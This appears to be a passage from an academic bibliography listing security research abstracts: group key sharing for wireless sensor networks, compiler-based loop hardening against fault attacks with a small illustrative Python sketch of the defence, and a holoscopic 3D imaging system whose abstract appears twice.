A wireless sensor network (WSN) is composed of sensor nodes and a base station. In WSNs, constructing an efficient key-sharing scheme to ensure a secure communication is important. In this paper, we propose a new key-sharing scheme for groups, which shares a group key in a single broadcast without being dependent on the number of nodes. This scheme is based on geometric characteristics and has information-theoretic security in the analysis of transmitted data. We compared our scheme with conventional schemes in terms of communication traffic, computational complexity, flexibility, and security, and the results showed that our scheme is suitable for an Internet-of-Things (IoT) network.

Proy, Julien, Heydemann, Karine, Berzati, Alexandre, Cohen, Albert.  2017.  Compiler-Assisted Loop Hardening Against Fault Attacks. ACM Trans. Archit. Code Optim.. 14:36:1–36:25.
Secure elements widely used in smartphones, digital consumer electronics, and payment systems are subject to fault attacks. To thwart such attacks, software protections are manually inserted requiring experts and time. The explosion of the Internet of Things (IoT) in home, business, and public spaces motivates the hardening of a wider class of applications and the need to offer security solutions to non-experts. This article addresses the automated protection of loops at compilation time, covering the widest range of control- and data-flow patterns, in both shape and complexity. The security property we consider is that a sensitive loop must always perform the expected number of iterations; otherwise, an attack must be reported. We propose a generic compile-time loop hardening scheme based on the duplication of termination conditions and of the computations involved in the evaluation of such conditions. We also investigate how to preserve the security property along the compilation flow while enabling aggressive optimizations. We implemented this algorithm in LLVM 4.0 at the Intermediate Representation (IR) level in the backend. On average, the compiler automatically hardens 95% of the sensitive loops of typical security benchmarks, and 98% of these loops are shown to be robust to simulated faults. Performance and code size overhead remain quite affordable, at 12.5% and 14%, respectively.
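As a conceptual rendering of the duplicated-termination-condition idea (the paper applies it automatically at the LLVM IR level to compiled code, not in Python), the sketch below duplicates the loop bound and induction variable and treats any disagreement, or a wrong final iteration count, as evidence of a fault injection; the names and structure are illustrative.

class FaultDetected(Exception):
    """Raised when the duplicated loop checks disagree (suspected fault injection)."""

def hardened_sum(values):
    n = len(values)
    n_dup = len(values)               # duplicated loop bound
    i = 0
    i_dup = 0                         # duplicated induction variable
    total = 0
    while i < n:
        if not (i_dup < n_dup):       # re-evaluated duplicate of the termination condition
            raise FaultDetected("termination conditions disagree")
        total += values[i]
        i += 1
        i_dup += 1
    if i != n or i_dup != n_dup:      # final check: loop ran the expected number of times
        raise FaultDetected("loop exited with the wrong iteration count")
    return total

print(hardened_sum([1, 2, 3, 4]))     # 10 when no fault is injected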
Hosseini, S., Swash, M. R., Sadka, A..  2017.  Immersive 360 Holoscopic 3D system design. 2017 4th International Conference on Signal Processing and Integrated Networks (SPIN). :325–329.

3D imaging has recently been a hot research topic due to high demand from various applications in security, health, autonomous vehicles, and robotics. Yet stereoscopic 3D imaging is limited by its principle, which mimics the human eye technique: the camera separation baseline defines the amount of 3D depth that can be captured. Holoscopic 3D (H3D) imaging is based on the “Fly's eye” technique, which uses coherent replication of light to record a spatial image of a real scene using a microlens array (MLA) that gives complete 3D parallax. H3D imaging is considered a promising 3D imaging technique because it pursues a simple form of 3D acquisition using a single-aperture camera; it is therefore well suited for scalable digitization, security, and autonomous applications. This paper proposes a 360-degree holoscopic 3D imaging system design for immersive 3D acquisition and stitching.
3D imaging has been a hot research topic recently due to a high demand from various applications of security, health, autonomous vehicle and robotics. Yet Stereoscopic 3D imaging is limited due to its principles which mimics the human eye technique thus the camera separation baseline defines amount of 3D depth can be captured. Holoscopic 3D (H3D) Imaging is based on the “Fly's eye” technique that uses coherent replication of light to record a spatial image of a real scene using a microlens array (MLA) which gives the complete 3D parallax. H3D Imaging has been considered a promising 3D imaging technique which pursues the simple form of 3D acquisition using a single aperture camera therefore it is the most suited for scalable digitization, security and autonomous applications. This paper proposes 360-degree holoscopic 3D imaging system design for immersive 3D acquisition and stitching.